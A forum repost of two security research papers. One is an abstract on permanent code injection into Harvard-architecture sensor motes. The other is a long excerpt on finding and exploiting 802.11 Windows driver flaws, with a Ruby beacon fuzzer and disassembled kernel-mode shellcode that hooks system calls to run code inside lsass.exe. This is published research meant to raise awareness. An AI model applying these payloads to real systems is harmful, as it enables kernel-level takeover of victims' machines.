Everything posted by Nytro

  1. Code Injection Attacks on Harvard-Architecture Devices

Aurélien Francillon, INRIA Rhône-Alpes, 655 avenue de l'Europe, Montbonnot, 38334 Saint Ismier Cedex, France, aurelien.francillon@inria.fr
Claude Castelluccia, INRIA Rhône-Alpes, 655 avenue de l'Europe, Montbonnot, 38334 Saint Ismier Cedex, France, claude.castelluccia@inria.fr

ABSTRACT

Harvard architecture CPU design is common in the embedded world. Examples of Harvard-based architecture devices are the Mica family of wireless sensors. Mica motes have limited memory and can process only very small packets. Stack-based buffer overflow techniques that inject code into the stack and then execute it are therefore not applicable. It has been a common belief that code injection is impossible on Harvard architectures. This paper presents a remote code injection attack for Mica sensors. We show how to exploit program vulnerabilities to permanently inject any piece of code into the program memory of an Atmel AVR-based sensor. To our knowledge, this is the first result that presents a code injection technique for such devices. Previous work only succeeded in injecting data or performing transient attacks. Injecting permanent code is more powerful since the attacker can gain full control of the target sensor. We also show that this attack can be used to inject a worm that can propagate through the wireless sensor network and possibly create a sensor botnet. Our attack combines different techniques such as return oriented programming and fake stack injection. We present implementation details and suggest some counter-measures.

Download: www.inrialpes.fr/planete/people/ccastel/PAPERS/CCS08.pdf
  2. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

11/2006
Johnny Cache (johnycsh[a t]802.11mercenary.net)
H D Moore (hdm[a t]metasploit.com)
skape (mmiller[a t]hick.org)

1) Foreword

Abstract: This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised.

Thanks: The authors would like to thank David Maynor, Richard Johnson, and Chris Eagle.

2) Introduction

Software security has matured a lot over the past decade. It has gone from being an obscure problem that garnered little interest from corporations to something that has created an industry of its own.
Corporations that once saw little value in investing resources in software security now have entire teams dedicated to rooting out security issues. The reason for this shift in attitude is surely multifaceted, but it could be argued that the greatest influence came from improvements to exploitation techniques that could be used to take advantage of software vulnerabilities. The refinement of these techniques made it possible for reliable exploits to be used without any knowledge of the vulnerability. This shift effectively eliminated the already thin crutch of barrier-to-entry complacency which many corporations were guilty of leaning on. Whether or not the refinement of exploitation techniques was indeed the turning point, the fact remains that there now exists an industry that has been spawned in the name of software security.

Of particular interest for the purpose of this paper are the corporations and individuals within this industry that have invested time in researching and implementing solutions that attempt to tackle the problem of exploit prevention. As a result of this time investment, things like non-executable pages, address space layout randomization (ASLR), stack canaries, and other novel preventative measures are becoming commonplace in the desktop market.

While there should be no argument that the mainstream integration of many of these technologies is a good thing, there's a problem. This problem centers around the fact that the majority of these exploit prevention solutions to date have been slightly narrow-sighted in their implementations. In particular, these solutions generally focus on preventing exploitation in only one context: user-mode. This is not true in all cases. The authors would like to take care to mention that solutions like grsecurity from the PaX team have had support for features that help to provide kernel-level security. Furthermore, stack canary implementations have existed and are integrated with many mainstream kernels.
However, not all device drivers have been compiled to take advantage of these new enhancements. The reason for this narrow-sightedness is often defended based on the fact that kernel-mode vulnerabilities have been far less prevalent. Furthermore, kernel-mode vulnerabilities are considered by most to require a much more sophisticated attack when compared with user-mode vulnerabilities.

The prevalence of kernel-mode vulnerabilities could be interpreted in many different ways. The naive way would be to think that kernel-mode vulnerabilities really are few and far between. After all, this is code that should have undergone rigorous code coverage testing. A second interpretation might consider that kernel-mode vulnerabilities are more complex and thus harder to find. A third interpretation might be that there are fewer eyes focused on looking for kernel-mode vulnerabilities. While there are certainly other factors, the authors feel that it is probably best captured by the second and third interpretation.

Even if prevalence is affected because of the relative difficulty of exploiting kernel-mode vulnerabilities, it's still a poor excuse for exploit prevention solutions to simply ignore it. The past has already shown that exploitation techniques for user-mode vulnerabilities were refined to the point of creating increasingly reliable exploits. These increasingly reliable exploits were then incorporated into automated worms. What's so different about kernel-mode vulnerabilities? Sure, they are complicated, but so were heap overflows. The authors see no reason to expect that kernel-mode vulnerabilities won't also experience a period of revolutionary public advancements to existing exploitation techniques. In fact, this period has already started[5,2,1]. Still, most corporations seem content to lean on the same set of crutches, waiting for proof that a problem really exists.
It's hoped that this paper can assist in the process of making it clear that kernel-mode vulnerabilities can be just as easy to exploit as user-mode vulnerabilities. It really shouldn't come as a surprise that kernel-mode vulnerabilities exist. The intense focus put upon preventing the exploitation of user-mode vulnerabilities has caused kernel-mode security to lag behind. This lag is further complicated by the fact that developers who write kernel-mode software must generally have a completely different mentality relative to what most user-mode developers are accustomed to. This is true regardless of what operating system a programmer might be dealing with (so long as it's a task-oriented operating system with a clear separation between system and user).

User-mode programmers who decide to dabble in writing device drivers for NT will find themselves in for a few surprises. The most apparent thing one would notice is that the old Windows Driver Model (WDM) and the new Windows Driver Framework (WDF) represent completely different APIs relative to what a user-mode developer would be familiar with. There are a number of standard C runtime artifacts that can still be used, but their use in device driver code stands out like a sore thumb. This fact hasn't stopped developers from using dangerous string functions.

While the API being completely different is surely a big hurdle, there are a number of other gotchas that a user-mode programmer wouldn't normally find themselves worrying about. One of the most interesting limitations imposed upon device driver developers is the conservation of stack space. On modern derivatives of NT, kernel-mode threads are only provided with 3 pages (12288 bytes) of stack space. In user-mode, thread stacks will generally grow as large as 256KB (this default limit is controlled by the optional header of an executable binary).
Due to the limited amount of kernel-mode thread stack space, it should be rare to ever see a device driver consuming a large amount of space within a stack frame. Nevertheless, it was observed that the Intel Centrino drivers have multiple instances of functions that consume over 1 page of stack space. That's 33% of the available stack space wasted within one stack frame!

Perhaps the most important of all of the differences is the extra care that must be taken when it comes to dealing with things like performance, error handling, and re-entrancy. These major elements are critical to ensuring the stability of the operating system as a whole. If a programmer is negligent in their handling of any of these things in user-mode, the worst that will happen is the application will crash. In kernel-mode, however, a failure to properly account for any of these elements will generally affect the stability of the system as a whole. Even worse, security related flaws in device drivers provide a point of exposure that can result in super-user privileges.

From this very brief introduction, it is hoped that the reader will begin to realize that device driver development is a different world. It's a world that's filled with a greater number of restrictions and problems, where the implications of software bugs are much greater than one would normally see in user-mode. It's a world that hasn't yet received adequate attention in the form of exploit prevention technology, thus making it possible to improve and refine kernel-mode exploitation techniques. It should come as no surprise that such a world would be attractive to researchers and tinkerers alike. This very attraction is, in fact, one of the major motivations for this paper. While the authors will focus strictly on the process used to identify and exploit flaws in wireless device drivers, it should be noted that other device drivers are equally likely to be prone to security issues.
However, most other device drivers don't have the distinction of exposing a connectionless layer-2 attack surface to all devices in close proximity. Frankly, it's hard to get much cooler than that. That only happens in the movies, right?

To kick things off, the structure of this paper is as follows. In chapter 3, the steps used to find vulnerabilities in wireless device drivers, such as through the use of fuzzing, are described. Chapter 4 explains the process of actually leveraging a device driver vulnerability to execute arbitrary code and how the 3.0 version of the Metasploit Framework has been extended to make this trivial to deal with. Finally, chapter 5 provides three real world examples of wireless device driver vulnerabilities. Each real world example describes the trials and tribulations of the vulnerability starting with the initial discovery and ending with arbitrary code execution.

3) Pre-Exploitation

This chapter describes the tools and strategies used by the authors to identify 802.11 wireless device driver vulnerabilities. Section 3.1 provides a basic description of the 802.11 protocol in order to provide the reader with information necessary to understand the attack surface that is exposed by 802.11 device drivers. Section 3.2 describes the basic interface exposed by the 3.0 version of the Metasploit Framework that makes it possible to craft arbitrary 802.11 packets. Finally, section 3.3 describes a basic approach to fuzzing certain aspects of the way a device driver handles certain 802.11 protocol functions.

3.1) Attack Surface

Device drivers suffer from the same types of vulnerabilities that apply to any other code written in the C programming language. Buffer mismanagement, faulty pointer math, and integer overflows can all lead to exploitable conditions. Device driver flaws are often seen as a low risk issue due to the fact that most drivers do not process attacker-controlled data. The exception, of course, is drivers for networking devices.
Although Ethernet devices (and their drivers) have been around forever, the simplicity of what the driver has to handle has greatly limited the attack surface. Wireless drivers are required to handle a wider range of requests and are also required to expose this functionality to anyone within range of the wireless device. In the world of 802.11 device drivers, the attack surface changes based on the state of the device. The three primary states are:

1. Unauthenticated and Unassociated
2. Authenticated and Unassociated
3. Authenticated and Associated

In the first state, the client is not connected to a specific wireless network. This is the default state for 802.11 drivers and will be the focus for this section. The 802.11 protocol defines three different types of frames: Control, Management, and Data. These frame types are further divided into three classes (1, 2, and 3). Only frames in the first class are processed in the Unauthenticated and Unassociated state. The following 802.11 management sub-types are processed by clients while in state 1[3]:

1. Probe Request
2. Probe Response
3. Beacon
4. Authentication

The Probe Response and Beacon sub-types are used by wireless devices to discover and advertise the local wireless networks. Clients can transmit Probe Requests to discover networks as well (more below). The Authentication sub-type is used to join a specific wireless network and reach the second state. Wireless clients discover the list of available networks in two different ways. In Active Mode, the client will send a Probe Request containing an empty SSID field. Any access point in range will reply with a Probe Response containing the parameters of the wireless network it serves. Alternatively, the client can specify the SSID it is looking for. In Passive Mode, clients will listen for Beacon frames and read the network parameters from within the beacon.
Since both of these methods result in a frame that contains wireless network information, it makes sense for the frame format to be similar. The method chosen by the client is determined by the capabilities of the device and the application using the driver. A beacon frame includes a generic 802.11 header that defines the packet type, source, destination, Basic Service Set ID (BSSID) and other envelope information. Beacons also include a fixed-length header that is composed of a timestamp, beacon interval, and a capabilities field. The fixed-length header is followed by one or more Information Elements (IEs) which are variable-length fields and contain the bulk of the access point information. A probe response frame is almost identical to a beacon frame except that the destination address is set to that of the client whereas beacons set it to the broadcast address.

Information elements consist of an 8-bit type field, an 8-bit length field, and up to 255 bytes of data. This type of structure is very similar to the common Type-Length-Value (TLV) form used in many different protocols. Beacon and probe response packets must contain an SSID IE, a Supported Rates IE, and a Channel IE for most wireless clients to process the packet. The 802.11 specification states that the SSID field (the human name for a given wireless network) should be no more than 32 bytes long. However, the maximum length of an information element is 255 bytes long. This leaves quite a bit of room for error in a poorly-written wireless driver. Wireless drivers support a large number of different information element types. The standard even includes support for proprietary, vendor-specific IEs.

3.2) Packet Injection

In order to attack a driver's beacon and probe response processing code, a method of sending raw 802.11 frames to the device is needed.
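The type-length-value layout described above is simple enough to parse in a few lines of Ruby. The following sketch (`parse_ies` is an illustrative helper written for this discussion, not part of any framework) walks a buffer of information elements and shows where the length byte must be validated:

```ruby
# Parse a buffer of 802.11 information elements into [type, data] pairs.
# Layout per element: 1-byte type, 1-byte length, up to 255 bytes of data.
def parse_ies(buf)
  buf = buf.b               # treat the input as raw bytes
  ies = []
  i = 0
  while i + 2 <= buf.length
    t = buf.getbyte(i)      # 8-bit element type (0 = SSID)
    l = buf.getbyte(i + 1)  # 8-bit length; may legally claim up to 255 bytes
    # A driver that trusts l without a bounds check, or that copies an SSID
    # IE into a fixed 32-byte buffer, exhibits exactly the bug class at issue.
    break if i + 2 + l > buf.length
    ies << [t, buf[i + 2, l]]
    i += 2 + l
  end
  ies
end

# An SSID IE (type 0, "test") followed by a Supported Rates IE (type 1)
parse_ies("\x00\x04test\x01\x02\x82\x84")
```

A fuzzer inverts this logic: rather than parsing well-formed elements, it emits elements whose length bytes disagree with the data that follows.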
Although the ability to send raw 802.11 packets is not a supported feature in most wireless cards, many open-source drivers can be convinced to integrate support with a small patch. A few even support it natively. Under the Linux operating system, there is a wide range of hardware and drivers that support raw packet injection. Unfortunately, each driver provides a slightly different interface for accessing this feature. To support many different wireless cards, a hardware-independent method for sending raw 802.11 frames is needed.

The solution is the LORCON library (Loss of Radio Connectivity), written by Mike Kershaw and Joshua Wright. This library provides a standardized interface for sending raw 802.11 packets through a variety of supported drivers. However, this library is written in C and does not expose any Ruby bindings by default. To make it possible to interact with this library from Ruby, a new Ruby extension (ruby-lorcon) was created that interfaces with the LORCON library and exposes a simple object-oriented interface. This wrapper interface makes it possible to send arbitrary wireless packets from a Ruby script.

The easiest way to call the ruby-lorcon interface from a Metasploit module is through a mixin. Mixins are used in the 3.0 version of the Metasploit Framework to improve code reuse and allow any module to import a rich feature set simply by including the right mixins. The mixin that exists for LORCON provides three new user options and a simple API for opening the interface, sending packets, and changing the channel.
+-----------+----------+----------+--------------------------------------------+
| Name      | Default  | Required | Description                                |
+-----------+----------+----------+--------------------------------------------+
| CHANNEL   | 11       | yes      | The default channel number                 |
| DRIVER    | madwifi  | yes      | The name of the wireless driver for lorcon |
| INTERFACE | ath0     | yes      | The name of the wireless interface         |
+-----------+----------+----------+--------------------------------------------+

A Metasploit module that wants to send raw 802.11 packets should include the Msf::Exploit::Lorcon mixin. When this mixin is used, a module can make use of wifi.open() to open the interface and wifi.write() to send packets. The user will specify the INTERFACE and DRIVER options for their particular hardware and driver. The creation of the 802.11 packet itself is left in the hands of the module developer.

3.3) Vulnerability Discovery

One of the fastest ways to find new flaws is through the use of a fuzzer. In general terms, a fuzzer is a program that forces an application to process highly variant data that is typically malformed in the hopes that one of the attempts will yield a crash. Fuzzing a wireless device driver depends on the device being in a state where specific frames are processed and a tool that can send frames likely to cause a crash. In the first part of this chapter, the authors described the default state of a wireless client and what types of management frames are processed in this state. The two types of frames that this paper will focus on are Beacons and Probe Responses.
These frames have the following structure:

+------+----------------------+
| Size | Description          |
+------+----------------------+
| 1    | Frame Type           |
| 1    | Frame Flags          |
| 2    | Duration             |
| 6    | Destination          |
| 6    | Source               |
| 6    | BSSID                |
| 2    | Sequence             |
| 8    | Timestamp            |
| 2    | Beacon Interval      |
| 2    | Capability Flags     |
| Var  | Information Elements |
| 2    | Frame Checksum       |
+------+----------------------+

The Information Elements field is a list of variable-length structures consisting of a one byte type field, a one byte length field, and up to 255 bytes of data. Variable-length fields are usually good targets for fuzzing since they require special processing when the packet is parsed. To attack a driver that uses Passive Mode to discover wireless networks, it's necessary to flood the target with mangled Beacons. To attack a driver that uses Active Mode, it's necessary to flood the target with mangled Probe Responses while forcing it to scan for networks. The following Ruby code generates a Beacon frame with randomized Information Element data. The Frame Checksum field is automatically added by the driver and does not need to be included.
#
# Generate a beacon frame with random information elements
#

# Maximum frame size (max is really 2312)
mtu = 1500

# Number of information elements
ies = rand(1024)

# Randomized SSID
ssid = Rex::Text.rand_text_alpha(rand(31)+1)

# Randomized BSSID
bssid = Rex::Text.rand_text(6)

# Randomized source
src = Rex::Text.rand_text(6)

# Randomized sequence
seq = [rand(255)].pack('n')

# Capabilities
cap = Rex::Text.rand_text(2)

# Timestamp
tstamp = Rex::Text.rand_text(8)

# Channel number (set from the CHANNEL option elsewhere in the module)
channel = 11

frame =
    "\x80" +                     # type/subtype (mgmt/beacon)
    "\x00" +                     # flags
    "\x00\x00" +                 # duration
    "\xff\xff\xff\xff\xff\xff" + # dst (broadcast)
    src +                        # src
    bssid +                      # bssid
    seq +                        # seq
    tstamp +                     # timestamp value
    "\x64\x00" +                 # beacon interval
    cap +                        # capabilities

    # First IE: SSID
    "\x00" + ssid.length.chr + ssid +

    # Second IE: Supported Rates
    "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

    # Third IE: Current Channel
    "\x03" + "\x01" + channel.chr

# Generate random Information Elements and append them
1.upto(ies) do |i|
    max = mtu - frame.length
    break if max < 2
    t = rand(256)
    l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
    d = Rex::Text.rand_text(l)
    frame += t.chr + l.chr + d
end

While this is just one example of a simple 802.11 fuzzer for a particular frame, much more complicated, state-aware fuzzers could be implemented that make it possible to fuzz other packet handling areas of wireless device drivers.

4) Exploitation

After an issue has been identified through the use of a fuzzer or through manual analysis, it's necessary to begin the process of determining a way to reliably gain control of the instruction pointer. In the case of stack-based buffer overflows on Windows, this process is often as simple as determining the offset to the return address and then overwriting it with an address of an instruction that jumps back into the stack.
That's the best case scenario, though, and there are often other hurdles that one may have to overcome regardless of whether or not the vulnerability exists in a device driver or in a user-mode program. These hurdles and other factors are what tend to make the process of getting reliable control of the instruction pointer one of the most challenging steps in exploit development. Rather than exhaustively describing all of the problems one could run into, the authors will instead provide illustrations in the form of real world examples included in chapter 5.

Assuming reliable control of the instruction pointer can be gained, the development of an exploit typically transitions into its final stage: arbitrary code execution. In user-mode, this stage has been completely automated for most exploit developers. It's become common practice to simply use Metasploit's user-mode payload generator. Kernel-mode payloads, on the other hand, have not seen an integrated solution for producing reliable payloads that can be dropped into any exploit. That's certainly not to say that there hasn't been previous work dealing with kernel-mode payloads, as there definitely has been[2,1], but their form up to now has been one that is not particularly easy to adopt. This lack of easy to use kernel-mode payloads can be seen as one of the major reasons why there has not been a large number of public, reliable kernel-mode exploits.

Since one of the goals of this paper is to illustrate how kernel-mode exploits can be written just as easily as user-mode exploits, the authors determined that it was necessary to incorporate the existing set of kernel-mode payload ideas into the 3.0 version of the Metasploit framework where they could be used freely with any future kernel-mode exploits. While this final integration was certainly the end-goal, there were a number of important steps that had to be taken before the integration could occur. The following sections will attempt to provide this background.
In section 4.1, the payload architecture that the authors selected is described in detail. This section also includes a description of the interface that has been exposed in the 3.0 version of the Metasploit Framework for developers who wish to implement kernel-mode exploits.

4.1) Payload Architecture

The payload architecture that the authors decided to integrate was based heavily on previous research[1]. As was alluded to in the introduction, there are a number of complicated considerations that must be taken into account when dealing with kernel-mode exploitation. A large majority of these considerations are directly related to what methods should be used when executing arbitrary code in the kernel. For example, if a device driver was holding a lock at the time that an exploit was triggered, what might be the best way to go about releasing that lock so as to recover the system so that it will still be possible to interact with it in a meaningful way? Other types of considerations include things like IRQL restrictions, cleaning up corrupted structures, and so on. These considerations lead to there being many different ways in which a payload might best be implemented for a particular vulnerability. This is quite a bit different from the user-mode environment where it's almost always possible to use the exact same payload regardless of the application.

Though these situational complications do exist, it is possible to design and implement a payload system that can be applied in almost any circumstance. By separating kernel-mode payloads into variable components, it becomes possible to combine components together in different ways to form functional variations that are best suited for particular situations. In Windows Kernel-mode Payload Fundamentals [1], kernel-mode payloads are broken down into four different components: migration, stagers, recovery, and stages.
When describing kernel-mode payloads in terms of components, the migration component would be one that is used to migrate from an unsafe execution environment to a safe execution environment. For example, if the IRQL is at DISPATCH when a vulnerability is triggered, it may be necessary to migrate to a safer IRQL such as PASSIVE. It is not always necessary to have a migration component.

The purpose of a stager component is to move some portion of the payload so that it executes in the context of another thread. This may be necessary if the current thread is of critical importance or may lead to a deadlock of the system should certain operations be used. The use of a stager may obviate the need for a migration component.

A recovery component is something that is used to restore the system to a clean state and then continue execution. This component is generally one that may require customization for a given vulnerability as it may not always be possible to describe the steps needed to recover the system in a generic way. For example, if locks were held at the time that the vulnerability was triggered, it may be necessary to find a way to release those locks and then continue execution from a safe point.

Finally, the stage component is a catch-all for whatever arbitrary code may be executed once the payload is running in a safe environment.

This model for describing kernel-mode payloads is what the authors decided to adopt. To better understand how this model works, it seems best to describe how it was applied for all three real world vulnerabilities that are shown in chapter 5. These three vulnerabilities actually make use of the same basic underlying payload, which will henceforth be referred to as ``the payload'' for brevity. The payload itself is composed of three of the four components. Each of the payload components will be discussed individually and then as a whole to provide an idea for how the payload operates.
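Before walking through the individual components, the component model itself can be pictured as simple concatenation: a finished payload is whichever component blobs a given vulnerability needs, laid out in execution order. The sketch below is illustrative only; the component names follow the text, the byte strings are stand-ins for real shellcode fragments, and nothing here is actual Metasploit framework code:

```ruby
# Model each payload component as a raw byte string and the finished payload
# as their concatenation in execution order. migration is optional, matching
# the text: not every vulnerability needs one.
def build_payload(stager:, recovery:, stage:, migration: "")
  # migration (if any) runs first, the stager copies the stage somewhere safe,
  # recovery restores the system, and the stage runs later in a safe context
  migration.b + stager.b + recovery.b + stage.b
end

# Hypothetical two- and one-byte blobs standing in for real components
payload = build_payload(stager:   "\xeb\x38",
                        recovery: "\x31\xc0",
                        stage:    "\x90")
```

The value of the model is that swapping one component (say, a different recovery strategy for a different vulnerability) leaves the others untouched.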
The first component that exists in the payload is a stager component. The stager that the authors chose to use is based on the SharedUserData SystemCall Hook stager described in [1]. Before understanding how the stager works, it's important to understand a few things. As the name implies, the stager accomplishes its goal by hooking the SystemCall attribute found within SharedUserData. As a point of reference, SharedUserData is a global page that is shared between user-mode and kernel-mode. It acts as a sort of global structure that contains things like tick count and time information, version information, and quite a few other things. It's extremely useful for a few different reasons, not the least of which being that it's located at a fixed address in user-mode and in kernel-mode on all NT derivatives. This means that the stager is instantly portable and doesn't need to perform any symbol resolution to locate the address, thus helping to keep the overall size of the payload small.

The SystemCall attribute that is hooked is part of an enhancement that was added in Windows XP. This enhancement was designed to make it possible to use optimized system call instructions depending on what hardware support is present on a given machine. Prior to Windows XP, system calls were dispatched from user-mode through the hardcoded use of the int 0x2e soft interrupt. Over time, hardware enhancements were made to decrease the overhead involved in performing a system call, such as through the introduction of the sysenter instruction.

Since Microsoft isn't in the business of providing different versions of Windows for different makes and models of hardware, they decided to determine at runtime which system call interface to use. SharedUserData was the perfect candidate for storing the results of this runtime determination as it was already a shared page that existed in every user-mode process.
After making these modifications, ntdll.dll was updated to dispatch system calls through SharedUserData rather than through the hardcoded use of int 0x2e. The initial implementation of this new system call dispatching interface placed executable code within the SystemCall attribute of SharedUserData. Subsequent versions of Windows, such as XP SP2, turned the SystemCall attribute into a function pointer.

One important implication about the introduction of the SystemCall attribute to SharedUserData is that it represents a pivot point through which all system call dispatching occurs in user-mode. In previous versions of Windows, each user-mode system call stub routine invoked int 0x2e directly. In the latest versions, these stub routines make indirect calls through the SystemCall function pointer. By default, this function pointer is initialized to point to one of a few exported symbols within ntdll.dll. However, the implications of this function pointer being changed to point elsewhere mean that it would be possible to intercept all system calls within all processes. This implication is what forms the very foundation for the stager that is used by the payload.

When the stager begins executing, it's running in kernel-mode in the context of the thread that triggered the vulnerability. The first action it takes is to copy a chunk of code (the stage) into an unused portion of SharedUserData using the predictable address of 0xffdf037c. After the copy operation completes, the stager proceeds by hooking the SystemCall attribute. This hook must be handled differently depending on whether the target operating system is pre-XP SP2. More details on how this can be handled are described in [1]. Regardless of the approach, the SystemCall attribute is redirected to point to 0x7ffe037c. This predictable location is the user-mode accessible address of the unused portion of SharedUserData where the stage was copied into.
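The relationship between the two magic constants is worth spelling out: SharedUserData is one physical page mapped at two fixed virtual base addresses, so the 0x37c offset into the page is the same from both views. A quick arithmetic check (the two stage addresses are taken from the text above; the base addresses are the standard fixed mappings they imply):

```ruby
# SharedUserData is mapped at a fixed kernel-mode and a fixed user-mode
# address on all NT derivatives; only the base differs, the page offset
# into the shared page is identical.
KERNEL_BASE = 0xffdf0000  # kernel-mode mapping of SharedUserData
USER_BASE   = 0x7ffe0000  # user-mode mapping of the same physical page
STAGE_OFF   = 0x37c       # unused region the stager copies the stage into

kernel_stage = KERNEL_BASE + STAGE_OFF  # where the stager writes
user_stage   = USER_BASE   + STAGE_OFF  # where SystemCall is pointed
```

This is why the stager can write through 0xffdf037c while redirecting the SystemCall pointer to 0x7ffe037c: both refer to the same bytes.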
After the hooking operation completes, all system calls invoked by user-mode processes will first go through the stage placed at 0x7ffe037c. The stager portion of the payload looks something like this (note: this implementation is only designed to work on XP SP2 and Windows 2003 Server SP1; modifications would need to be made to make it work on previous versions of XP and 2003):

; Jump/Call to get the address of the stage
00000000  EB38            jmp short 0x3a
00000002  BB0103DFFF      mov ebx,0xffdf0301
00000007  4B              dec ebx
00000008  FC              cld
; Copy the stage into 0xffdf037c
00000009  8D7B7C          lea edi,[ebx+0x7c]
0000000C  5E              pop esi
0000000D  6AXX            push byte num_stage_dwords
0000000F  59              pop ecx
00000010  F3A5            rep movsd
; Set edi to the address of the soon-to-be function pointer
00000012  BF7C03FE7F      mov edi,0x7ffe037c
; Check to make sure the hook hasn't already been installed
00000017  393B            cmp [ebx],edi
00000019  7409            jz 0x24
; Grab SystemCall function pointer
0000001B  8B03            mov eax,[ebx]
0000001D  8D4B08          lea ecx,[ebx+0x8]
; Store the existing value in 0x7ffe0308
00000020  8901            mov [ecx],eax
; Overwrite the existing function pointer and make things live!
00000022  893B            mov [ebx],edi

; recovery stub here

0000003A  E8C3FFFFFF      call 0x2

; stage here

With the hook in place, the stager has completed its primary task, which was to copy a stage into a location where it can be executed in the future. Before the stage can execute, the stager must allow the recovery component of the payload to execute. As mentioned previously, the recovery component represents one of the most vulnerability-specific portions of any kernel-mode payload. For the purpose of the exploits described in chapter 5, a special purpose recovery component was necessary. This particular recovery component was required due to the fact that the example vulnerabilities are triggered in the context of the Idle thread. On Windows, the Idle thread is a special kernel thread that executes whenever a processor is idle.
Due to the nature of the way the Idle thread operates, it's dangerous to perform operations like spinning the thread or any of the other recovery methods described in [1]. It may also be possible to apply the technique for delaying execution within the Idle thread as discussed in [2]. The recovery method that was finally selected involves two basic steps. First, the IRQL for the current processor is restored to DISPATCH level just in case it was executing at a higher IRQL. Second, execution control is transferred to the first instruction of nt!KiIdleLoop after initializing registers appropriately. The end effect is that the Idle thread begins executing all over again and, if all goes well, the system continues operating as if nothing had happened. In practice, this recovery method has proven reliable. However, the one negative it has is that it requires knowledge of the address at which nt!KiIdleLoop resides. This dependence represents an area that is ripe for future improvement. Regardless of its limitations, the recovery component for the payload looks like the code below:

; Restore the IRQL
00000024  31C0            xor eax,eax
00000026  64C6402402      mov byte [fs:eax+0x24],0x2
; Initialize assumed registers
0000002B  8B1D1CF0DFFF    mov ebx,[0xffdff01c]
00000031  B827BB4D80      mov eax,0x804dbb27
00000036  6A00            push byte +0x0
; Transfer control to nt!KiIdleLoop
00000038  FFE0            jmp eax

After the recovery component has completed its execution, all of the payload code that was originally executing in kernel-mode is complete. The final portion of the payload that remains to be executed is the stage that was copied by the stager. The stage itself runs in user-mode within all process contexts, and it executes every time a system call is dispatched. The implications of this should be obvious. Having a stage that executes within every process every time a system call occurs is just asking for trouble.
For that reason, it makes sense to design a generic user-mode stage that can be used to limit the times that it executes to one particular context. The approach that the authors took to meet this requirement is as follows. First, the stage performs a check that is designed to see if it is running in the context of a specific process. This check is there in order to help ensure that the stage itself only executes in a known-good environment. As an example, it would be a shame to take advantage of a kernel-mode vulnerability only to finally execute code with the privileges of Guest. By default, this check is designed to see if the stage is running within lsass.exe, a process that runs with SYSTEM level privileges. If the stage is running within lsass, it performs a check to see if the SpareBool attribute of the Process Environment Block has been set to one. By default, this value is initialized to zero in all processes. If the SpareBool attribute is set to zero, then the stage proceeds to set the SpareBool attribute to one and then finishes by executing whatever code is remaining within the stage. If the SpareBool attribute is set to one, which means the stage has already run, or it's not running within lsass, it transfers control back to the original system call dispatching routine. This is necessary because it is still a requirement that system calls from user-mode processes be dispatched appropriately, otherwise the system itself would grind to a halt. 
An example of what this stage might look like is shown below:

; Preserve the calling environment
0000003F  60              pusha
00000040  6A30            push byte +0x30
00000042  58              pop eax
00000043  99              cdq
00000044  648B18          mov ebx,[fs:eax]
; Check if Peb->Ldr is NULL
00000047  39530C          cmp [ebx+0xc],edx
0000004A  7426            jz 0x72
; Extract Peb->ProcessParameters->ImagePathName.Buffer
0000004C  8B5B10          mov ebx,[ebx+0x10]
0000004F  8B5B3C          mov ebx,[ebx+0x3c]
; Add 0x28 to the image path name (skip past c:\windows\system32\)
00000052  83C328          add ebx,byte +0x28
; Compare the name of the executable with lass
00000055  8B0B            mov ecx,[ebx]
00000057  034B03          add ecx,[ebx+0x3]
0000005A  81F96C617373    cmp ecx,0x7373616c
; If it doesn't match, execute the original system call dispatcher
00000060  7510            jnz 0x72
00000062  648B18          mov ebx,[fs:eax]
00000065  43              inc ebx
00000066  43              inc ebx
00000067  43              inc ebx
; Check if Peb->SpareBool is 1, if it is, execute the original
; system call dispatcher
00000068  803B01          cmp byte [ebx],0x1
0000006B  7405            jz 0x72
; Set Peb->SpareBool to 1
0000006D  C60301          mov byte [ebx],0x1
; Jump into the continuation stage
00000070  EB07            jmp short 0x79
; Restore the calling environment and execute the original system call
; dispatcher that was preserved in 0x7ffe0308
00000072  61              popa
00000073  FF250803FE7F    jmp near [0x7ffe0308]

; continuation of the stage

The culmination of these three payload components is a functional payload that can be used in any situation where an exploit is triggered within the Idle thread. If the exploit is triggered outside of the context of the Idle thread, the recovery component can be swapped out with an alternative method and the rest of the payload can remain unchanged. This is one of the benefits of breaking kernel-mode payloads down into different components. To recap, the payload works by using a stager to copy a stage into an unused portion of SharedUserData.
The stager then points the SystemCall attribute at that unused portion, effectively causing all user-mode processes to bounce through the stage when they attempt to make a system call. Once the stager has completed, the recovery component restores the IRQL to DISPATCH and then restarts the Idle thread. The kernel-mode portion of the payload is then complete. Shortly after that, the stage that was copied to SharedUserData is executed in the context of a specific user-mode process, such as lsass.exe. Once this occurs, the stage sets a flag that indicates that it's been executed and completes. All told, the payload itself is only 115 bytes, excluding any additional code in the stage.

Given all of this infrastructure work, it's trivial to plug almost any user-mode payload into the stage. The additional code must simply be placed at the point where it's been verified that the stage is running in a particular process and that it hasn't been executed before. The reason for it being so trivial was quite intentional. One of the major goals in implementing this payload system was to make it possible to use the existing set of payloads in the Metasploit Framework in conjunction with any kernel-mode exploit. This includes even some of the more powerful payloads, such as Meterpreter and VNC injection.

There were two key elements involved in integrating kernel-mode payloads into the 3.0 version of the Metasploit Framework. The first had to do with defining the interface that exploit developers would need to use when writing kernel-mode exploits. The second dealt with defining the interface that end-users would have to be aware of when using kernel-mode exploits. In terms of precedence, defining the programming level interfaces first is the ideal approach. To that point, the programming interface that was decided upon is one that should be pretty easy to use. The majority of the complexity involved in selecting a kernel-mode payload is hidden from the developer.
